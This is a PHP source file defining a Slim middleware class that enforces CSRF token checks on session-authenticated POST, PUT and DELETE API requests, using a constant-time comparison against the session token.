<?php

/**
 * @file classes/security/authorization/internal/ApiCsrfMiddleware.inc.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2000-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @class ApiCsrfMiddleware
 * @ingroup security_authorization
 *
 * @brief Slim middleware which requires a CSRF token for POST, PUT and DELETE
 *  operations whenever an API Token is not in use.
 */

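class ApiCsrfMiddleware {

	/** @var APIHandler $handler Reference to api handler */
	protected $_handler = null;

	/**
	 * Constructor
	 *
	 * @param APIHandler $handler
	 */
	public function __construct(APIHandler $handler) {
		$this->_handler = $handler;
	}

	/**
	 * Middleware invokable function
	 *
	 * Rejects a request that needs CSRF protection (see _isCSRFRequired()) but
	 * does not carry a valid X-CSRF-Token header with a 403 JSON error; every
	 * other request is handed to the next middleware unchanged.
	 *
	 * @param SlimRequest $slimRequest request
	 * @param SlimResponse $response response
	 * @param callable $next Next middleware
	 * @return SlimResponse
	 */
	public function __invoke($slimRequest, $response, $next) {
		if ($this->_isCSRFRequired($slimRequest) && !$this->_isCSRFValid($slimRequest)) {
			return $response->withJson([
				'error' => 'form.csrfInvalid',
				'errorMessage' => __('form.csrfInvalid'),
			], 403);
		}
		return $next($slimRequest, $response);
	}

	/**
	 * Check if a CSRF token is required
	 *
	 * Not required when the handler reports an API token (the request is then
	 * not authenticated by a session cookie); otherwise required for the
	 * state-changing methods POST, PUT and DELETE.
	 *
	 * @param SlimRequest $slimRequest
	 * @return boolean
	 */
	protected function _isCSRFRequired($slimRequest) {
		if ($this->_handler->getApiToken()) {
			return false;
		}
		$server = $slimRequest->getServerParams();
		// Strict comparison: only an exact method string may match.
		// NOTE(review): PATCH is not listed here; confirm whether the API routes accept it.
		return !empty($server['REQUEST_METHOD']) && in_array($server['REQUEST_METHOD'], ['POST', 'PUT', 'DELETE'], true);
	}

	/**
	 * Check if the CSRF token is present and valid
	 *
	 * Compares the X-CSRF-Token request header against the token held by the
	 * current session; a missing header or missing session fails the check.
	 *
	 * @param SlimRequest $slimRequest
	 * @return boolean
	 */
	protected function _isCSRFValid($slimRequest) {
		$server = $slimRequest->getServerParams();
		if (empty($server['HTTP_X_CSRF_TOKEN'])) {
			return false;
		}
		$session = Application::get()->getRequest()->getSession();
		if (!$session) {
			return false;
		}
		// hash_equals() keeps the comparison time independent of where the
		// strings first differ. Both operands are cast so a non-string session
		// token compares unequal instead of raising a TypeError.
		return hash_equals((string) $session->getCSRFToken(), (string) $server['HTTP_X_CSRF_TOKEN']);
	}
}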
